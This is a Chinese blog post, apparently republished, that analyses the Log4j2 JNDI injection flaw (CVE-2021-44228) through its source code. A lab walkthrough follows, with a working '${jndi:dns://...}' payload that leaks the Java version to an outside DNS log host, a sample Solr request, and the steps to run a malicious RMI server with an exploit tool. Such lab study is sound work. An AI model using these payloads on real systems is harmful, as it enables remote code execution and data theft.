个人中心
文章发布
退出
作者热门文章
- VisualStudio2022插件的安装及使用-编程手把手系列文章
- pprof-在现网场景怎么用
- C#实现的下拉多选框,下拉多选树,多级节点
- 【学习笔记】基础数据结构:猫树
59
4
前排提醒:本篇文章基于我另外一篇总结的JNDI注入后写的,建议先看该文章进行简单了解JNDI注入: https://blog.csdn.net/weixin_60521036/article/details/142322372 提前小结说明: Log4j2(CVE-2021-44228)漏洞造成是因为 通过MessagePatternConverter类进入他的format函数入口后需匹配判断是否存在${,若存在进入if后的workingBuilder.append(config.getStrSubstitutor().replace(event, value));,最终走到了lookup函数进行jndi注入。 那么我们待会分析就从MessagePatternConverter的format函数开始剖析源码.
参考了网上的文章后,总结发现其实只需要理解最关键和知道几个函数调用栈就能够理解log4j漏洞是怎么造成了.
1.首先是打点走到MessagePatternConverter的format函数,这里是事故发生地。 2.看黄色框,进入if,log4j2漏洞正式开始 3.注意看这里是匹配 $和 { 这里真就匹配这两个,不要觉得说不对称为啥不多匹配一个},就是找到你是否用了${}这种格式,用了的话就进到里面做深一步的操作。 (注:这里不会做递归,假如你 ${${}},递归那一步需要继续看我后面的解释) 4.看黄色框,workingBuilder.append(config.getStrSubstitutor().replace(event, value));,这里有两点很重要,getStrSubstitutor和replace。 先进行getStrSubstitutor,获取一个StrSubstitutor的对象,接着StrSubstitutor执行replace方法。 5.这里需要跟进replace方法,他会执行substitute方法。substitute函数很重要,需要继续跟进他。 6.进到substitute里面他主要做了以下操作 。
prefixMatcher.isMatch来匹配${suffixMatcher.isMatch来匹配 }如果说匹配到存在${xxx}这种数据在的话,就进入到递归继续substitute执行,直到不存在${xxx}这种数据为止。(这里就是为了解决${${}}这种嵌套问题),那么这里也就解决了上面说为啥一开始进入format函数那里,只匹配${而不匹配完整的${}的疑惑了,进入到这里面才会继续判断,而且还能帮你解决${${}}这种双重嵌套问题。 7.这个substitute递归完出来后或者说没有继续进到substitute里面的话,下一行代码就是:varNameExpr = bufName.toString(); 作用是取出${xxxxx}其中的xxxx数据。 注意是取出来你${xxx}里面xxx数据,这里还没进行jndi的注入解析,所以不是解析结果而是取出你注入的代码。 8.进if里就是 取varName与varDefaultValue ,检测:和-为了分割出来的jndi与rmi://xxxx。这里不是说真的开发者故意写个函数去为了分割我们的恶意代码,而是这个功能就是这样,恰好我们利用了他而已。这里的函数就不跟进了,了解他就是进行了分割即可,拿到varName与varDefaultValue。 注:再提醒一次,当我们传入的是jndi:rmi://xxxx的时候,这里的varName与varDefaultValue 取出就是jndi和后面的rmi://xxxx 9.代码再往下走到会看到String varValue = resolveVariable(event, varName, buf, startPos, endPos); ,这里我们需要跟进resolveVariable才能继续深入看到jndi的执行.
10.到了这里终于看到lookup字眼了。 首先你需要知道:resolver = getVariableResolver() 是获得一个实现StrLookup接口的对象,命名为resolver 其次看到后面return resolver.lookup(event, variableName); 这里就是返回结果,也就是说这里lookup是执行了结果返回了,为了更加有说服力,这里就继续跟进lookup看他是怎么执行的,毕竟这里的jndi注入和之前不同,多了jndi:,而不是传统的直接使用rmi://xxxx.
11.这里可以看到通过prefix取出:前的jndi,然后再取出后面的rmi://xxxx 那么也就说这个lookup函数体内部作用是通过:字符分割,然后通过传入jndi四个字符到strlookupmap.get来找到jndi访问地址然后截取到后面的rmi用找到的jndi访问地址来lookup,那么最后可以看到就是拿到jndi的lookup对象去lookup查询.
到这就分析结束了.
substitute函数体里部分代码如下所示: (没有第11步的lookup函数体源码,下面是关于substitute的代码) 。
while (pos < bufEnd) {
final int startMatchLen = prefixMatcher.isMatch(chars, pos, offset, bufEnd); // prefixMatcher用来匹配是否前两个字符是${
if (startMatchLen == 0) {
pos++;
} else {
// found variable start marker,如果来到这里的话那么就说明了匹配到了${字符
if (pos > offset && chars[pos - 1] == escape) {
// escaped
buf.deleteCharAt(pos - 1);
chars = getChars(buf);
lengthChange--;
altered = true;
bufEnd--;
} else {
// find suffix,寻找后缀}符号
final int startPos = pos;
pos += startMatchLen;
int endMatchLen = 0;
int nestedVarCount = 0;
while (pos < bufEnd) {
if (substitutionInVariablesEnabled
&& (endMatchLen = prefixMatcher.isMatch(chars, pos, offset, bufEnd)) != 0) {
// found a nested variable start
nestedVarCount++;
pos += endMatchLen;
continue;
}
endMatchLen = suffixMatcher.isMatch(chars, pos, offset, bufEnd);
if (endMatchLen == 0) {
pos++;
} else {
// found variable end marker
if (nestedVarCount == 0) {
String varNameExpr = new String(chars, startPos + startMatchLen, pos - startPos - startMatchLen);
if (substitutionInVariablesEnabled) {
final StringBuilder bufName = new StringBuilder(varNameExpr);
substitute(event, bufName, 0, bufName.length()); // 递归调用
varNameExpr = bufName.toString();
}
pos += endMatchLen;
final int endPos = pos;
String varName = varNameExpr;
String varDefaultValue = null;
if (valueDelimiterMatcher != null) {
final char [] varNameExprChars = varNameExpr.toCharArray();
int valueDelimiterMatchLen = 0;
for (int i = 0; i < varNameExprChars.length; i++) {
// if there's any nested variable when nested variable substitution disabled, then stop resolving name and default value.
if (!substitutionInVariablesEnabled
&& prefixMatcher.isMatch(varNameExprChars, i, i, varNameExprChars.length) != 0) {
break;
}
// 如果检测到其中还有:和-的符号,那么会将其进行分隔, :- 面的作为varName,后面的座位DefaultValue
if ((valueDelimiterMatchLen = valueDelimiterMatcher.isMatch(varNameExprChars, i)) != 0) {
varName = varNameExpr.substring(0, i);
varDefaultValue = varNameExpr.substring(i + valueDelimiterMatchLen);
break;
}
}
}
// on the first call initialize priorVariables
if (priorVariables == null) {
priorVariables = new ArrayList<>();
priorVariables.add(new String(chars, offset, length + lengthChange));
}
// handle cyclic substitution
checkCyclicSubstitution(varName, priorVariables);
priorVariables.add(varName);
// resolve the variable
//上面的一系列数据检测都完成了之后接下来就是解析执行这段数据了,这里是通过resolveVariable方法
String varValue = resolveVariable(event, varName, buf, startPos, endPos);
if (varValue == null) {
varValue = varDefaultValue;
}
if (varValue != null) {
// recursive replace
final int varLen = varValue.length();
buf.replace(startPos, endPos, varValue);
altered = true;
int change = substitute(event, buf, startPos, varLen, priorVariables);
change = change + (varLen - (endPos - startPos));
pos += change;
bufEnd += change;
lengthChange += change;
chars = getChars(buf); // in case buffer was altered
}
// remove variable from the cyclic stack
priorVariables.remove(priorVariables.size() - 1);
break;
}
nestedVarCount--;
pos += endMatchLen;
}
}
}
}
}
if (top) {
return altered ? 1 : 0;
}
return lengthChange;
}
约定:调用链每进一层函数就会加一个回车,我这里没有按照全限定名称来写,为了方便理解,加一个回车表示进入到函数的内部.
大白话总结:
下面是截图的原始数据 。
调用链
MessagePatternConverter的format函数
↓
workingBuilder.append(config.getStrSubstitutor().replace(event, value));
↓
config.getStrSubstitutor()
↓
config.getStrSubstitutor().replace()
↓
substitute
↓
1.prefixMatcher.isMatch来匹配${
2.suffixMatcher.isMatch来匹配 }
↓
进行一个判断 当上面1 2两点都符合的话, 进入substitute递归调用
这里就是为了解决${${}}这种嵌套问题。
↓
递归完下一行代码就是:varNameExpr = bufName.toString(); 作用是取出${xxxxx}其中的xxxx数据
↓接着走到这段代码-> if ((valueDelimiterMatchLen = valueDelimiterMatcher.isMatch(varNameExprChars, i)) != 0)
进if里就是 取varName与varDefaultValue ,检测:和-为了分割出来的jndi与rmi://xxxx
(这里不是说这么巧为了分割我们的恶意代码,而是这个功能就是这样,恰好我们利用了他而已)
↓
代码再往下走到->String varValue = resolveVariable(event, varName, buf, startPos, endPos);
进入resolveVariable函数里
↓
resolver = getVariableResolver() 获得一个实现StrLookup接口的对象
后面就return resolver.lookup(event, variableName); 这里就是返回
↓
接着这里继续跟进resolver.lookup的调用的话,这个lookup函数体内部作用是通过:字符分隔
然后通过传入jndi四个字符到strlookupmap.get来找到jndi访问地址然后截取到后面的rmi用jndi访问地址来lookup
vulhub找到log4j开一个CVE-2021-44228靶场 。
${jndi:dns://${sys:java.version}.example.com}是利用JNDI发送DNS请求的Payload,自己修改example.com为你自己的dnslog域名http://xxxxx:8983/solr/admin/cores?action=${jndi:dns://${sys:java.version}.xxxx.ceye.io}
接着查看我们的dnslog日志,发现确实存在log4j漏洞 。
那么现在开始进行rmi或者ldap攻击了 这里就直接使用利用工具: https://github.com/welk1n/JNDI-Injection-Exploit 开启恶意服务器: 设置好-C执行的命令 (-A 默认是第一张网卡地址,-A 你的服务器地址,我这里就默认了) 。
接着先查看下容器内不存在/tmp/success_hacker文件,因为我们-C写的是创建该文件 接着就可以进行rmi攻击了,复制上面搭建好的rmi服务:rmi://xxxxxxxxx:1099/dge0kr 再次查看就会发现已经创建成功了 PS:如果没有成功的话就多试几个rmi或者ldap服务地址,jdk8还是jdk7都试一下,以前我讲错了以为是1.7和1.8是本地开启工具使用的jdk版本,其实是目标服务器的jdk版本,所以还是那句话,都尝试一下就行,反正我们前面已经用dnslog拖出数据了,证明了是存在漏洞的.
参考文章: https://www.cnblogs.com/zpchcbd/p/16200105.html https://xz.aliyun.com/t/11056 。
最后此篇关于Log4j2—漏洞分析(CVE-2021-44228)的文章就讲到这里了,如果你想了解更多关于Log4j2—漏洞分析(CVE-2021-44228)的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。
59
4
0
我刚刚继承了一个旧的 PostgreSQL 安装,需要进行一些诊断以找出该数据库运行缓慢的原因。在 MS SQL 上,您可以使用 Profiler 等工具来查看正在运行的查询,然后查看它们的执行计划。
将目标从Analytics(分析)导入到AdWords中,然后在Analytics(分析)中更改目标条件时,是否可以通过更改将目标“重新导入”到AdWords,还是可以自动选择? 最佳答案 更改目标值
我正在使用google analytics api来获取数据。我正在获取数据,但我想验证两个参数,它们在特定日期范围内始终为0。我正在获取['ga:transactions']和['ga:goalCo
我使用Google API从Google Analytics(分析)获取数据,但指标与Google Analytics(分析)的网络界面不同。 即:我在2015年3月1日获得数据-它返回综合浏览量79
我在我的Web应用程序中使用sammy.js进行剔除。我正在尝试向其中添加Google Analytics(分析)。我很快找到了following plugin来实现页面跟踪。 我按照步骤操作,页面如
当使用 Xcode 分析 (product>analyze) 时,有没有办法忽略给定文件中的任何错误? 例如编译指示之类的? 我们只想忽略第三方代码的任何警告,这样当我们的代码出现问题时,它对我们
目录 EFK 1. 日志系统 2. 部署ElasticSearch 2.1 创建handless服务 2.2 创建s
关闭。这个问题不满足Stack Overflow guidelines .它目前不接受答案。 想改善这个问题吗?更新问题,使其成为 on-topic对于堆栈溢出。 7年前关闭。 Improve thi
GCC/G++ 是否有可用于输出分析的选项? 能够比较以前的代码与新代码之间的差异(大小、类/结构的大小)将很有用。然后可以将它们与之前的输出进行比较以进行比较,这对于许多目的都是有用的。 如果没有此
我正在浏览 LYAH,并一直在研究处理列表时列表理解与映射/过滤器的使用。我已经分析了以下两个函数,并包含了教授的输出。如果我正确地阅读了教授的内容,我会说 FiltB 的运行速度比 FiltA 慢很
在 MySQL 中可以使用 SET profiling = 1; 设置分析 查询 SHOW PROFILES; 显示每个查询所用的时间。我想知道这个时间是只包括服务器的执行时间还是还包括将结果发送到前
我用 Python 编写了几个用于生成阶乘的模块,我想测试运行时间。我找到了一个分析示例 here我使用该模板来分析我的模块: import profile #fact def main():
前几天读了下mysqld_safe脚本,个人感觉还是收获蛮大的,其中细致的交代了MySQL数据库的启动流程,包括查找MySQL相关目录,解析配置文件以及最后如何调用mysqld程序来启动实例等,有着
上一篇:《人工智能大语言模型起源篇,低秩微调(LoRA)》 (14)Rae 和同事(包括78位合著者!)于2022年发表的《Scaling Language Models: Methods, A
1 内网基础 内网/局域网(Local Area Network,LAN),是指在某一区域内有多台计算机互联而成的计算机组,组网范围通常在数千米以内。在局域网中,可以实现文件管理、应用软件共享、打印机
1 内网基础 内网/局域网(Local Area Network,LAN),是指在某一区域内有多台计算机互联而成的计算机组,组网范围通常在数千米以内。在局域网中,可以实现文件管理、应用软件共享、打印机
我有四列形式的数据。前三列代表时间,value1,value 2。第四列是二进制,全为 0 或 1。当第四列中对应的二进制值为0时,有没有办法告诉excel删除时间、值1和值2?我知道这在 C++ 或
我正在运行一个进行长时间计算的 Haskell 程序。经过一些分析和跟踪后,我注意到以下内容: $ /usr/bin/time -v ./hl test.hl 9000045000050000 Com
我有一个缓慢的 asp.net 程序正在运行。我想分析生产服务器以查看发生了什么,但我不想显着降低生产服务器的速度。 一般而言,配置生产盒或仅本地开发盒是标准做法吗?另外,您建议使用哪些程序来实现这一
我目前正在尝试分析 Haskell 服务器。服务器永远运行,所以我只想要一个固定时间的分析报告。我尝试只运行该程序 3 分钟,然后礼貌地要求它终止,但不知何故,haskell 分析器不遵守术语信号,并
我是一名优秀的程序员,十分优秀!